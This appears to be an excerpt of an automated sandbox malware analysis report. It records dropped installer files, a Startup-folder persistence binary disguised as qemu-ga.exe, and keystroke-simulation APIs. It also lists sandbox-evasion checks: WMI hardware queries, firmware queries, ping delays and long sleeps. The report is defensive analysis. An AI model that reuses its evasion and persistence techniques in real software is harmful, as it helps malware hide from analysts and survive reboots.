                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E2.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4E34.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI695.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F2F.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_009823FC IsWindowVisible, IsWindowEnabled, GetForegroundWindow, IsIconic, IsZoomed
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0090F64C GetForegroundWindow, FindWindowW, IsIconic, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, ShowWindow
                        Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_29-104983
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\msiexec.exe System information queried: FirmwareTableInformation
                        Source: Carbon.pif, 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4500Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6205Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3633Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4495Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow / User API: threadDelayed 1205
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow / User API: threadDelayed 1469
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 2816
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 7181
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 3237
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 6761
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3FB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF557.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF479.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DnsJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3DB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF38B.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5924.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3AB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF577.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI713.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifAPI coverage: 4.6 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep count: 5007 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep count: 4500 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -13835058055282155s >= -30000s
